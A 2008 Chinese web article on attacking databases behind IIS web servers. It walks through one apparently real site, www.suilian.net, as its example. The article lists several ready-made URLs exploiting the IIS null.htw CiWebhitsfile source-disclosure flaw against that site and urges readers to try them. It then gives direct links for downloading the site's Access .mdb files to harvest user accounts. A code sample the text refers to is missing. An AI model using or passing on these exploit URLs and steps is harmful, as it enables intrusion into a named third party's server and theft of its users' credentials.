扫一扫
关注微信公众号

浅谈对数据库的攻击
2008-04-24   

一般的web server都要使用数据库来存储信息,几乎所有的网站都要用数据库。这样就存在着两种可能,一种是使用小型数据库,如aceess,一般就储存在本地。另一种是使用大型数据库,如SQL server,Oracle这时候一般就放在另一台机器上,然后通过ODBC来访问它。 

由于页面经常需要查询各种信息,修改用户信息等操作,实质上就是和数据库打交道了。这样就给非法用户留下利用的机会了。

对本地数据库的攻击。

对本地数据库的攻击一种方法就是下载数据库,然后呢,你就可以打开这个数据库得到内部的用户和帐号了,以及其它有用的信息。

下面以“水莲会”为例:

经过扫描,得知www.suilian.net使用的是虚拟主机,使用的是WIndows NT+IIS4.0.扫描器你可以使用twwwscan或者其它,其实功能都大同小异。

在对IIS攻击时如果能够看到ASP源代码,那么成功的可能性就很大了。

经过测试,发现此站点存在源代码暴露漏洞。。。

大家可以试试:

http://www.suilian.net/null.htw?CiWebhitsfile=/maillist.asp%20&CiRestriction=none&CiHiliteType=full

http://www.suilian.net/null.htw?CiWebhitsfile=/index.asp%20&CiRestriction=none&CiHiliteType=full

http://www.suilian.net/null.htw?CiWebhitsfile=/chat/DetNew.asp%20&CiRestriction=none&CiHiliteType=full

http://www.suilian.net/null.htw?CiWebhitsfile=/chat/detail.asp%20&CiRestriction=none&CiHiliteType=full

http://www.suilian.net/null.htw?CiWebhitsfile=/chat/topic4.asp%20&CiRestriction=none&CiHiliteType=full

http://www.suilian.net/null.htw?CiWebhitsfile=/chat/titlefrm.asp%20&CiRestriction=none&CiHiliteType=full

http://www.suilian.net/null.htw?CiWebhitsfile=/chat/titlenew.asp%20&CiRestriction=none&CiHiliteType=full

看见了什么?

当然源代码泄露的漏洞有很多种,这里就不一一列举,你可以去查漏洞手册。

现在你就可以去查看ASP源代码了。

如果你对ASP不熟悉,我简单介绍一下(其实佳佳也不熟悉)。

ASP是嵌在之间。一般使用VBScript或者JavaScript书写代码。

看这个例子使用VBScript书写的:



这是一个典型的与数据库连接的代码。

依次的步骤为:

建立连接对象,

设置数据库路径,

打开数据库,

设置记录对象,

取记录。

这里我们就可以知道数据库的类型,名称和路径,这里是在当前目录下。

还可以知道数据库的表名和字段名称。

有经验的程序员一般不会把数据库名直接放在代码里,而是在ODBC里设置数据源,以增加安全性。

然后就发现存在

d:Ssuilianchatnews.mdb

d:Ssuiliantopic22.mdb等数据库

你只要使用

http://www.suilian.net/chat/news.mdb

http://www.suilian.net/topic22.mdb

就可以把它下载下来。。。

热词搜索:

上一篇:数据库服务器的安全
下一篇:保护数据库安全 关键在于加密

分享到: 收藏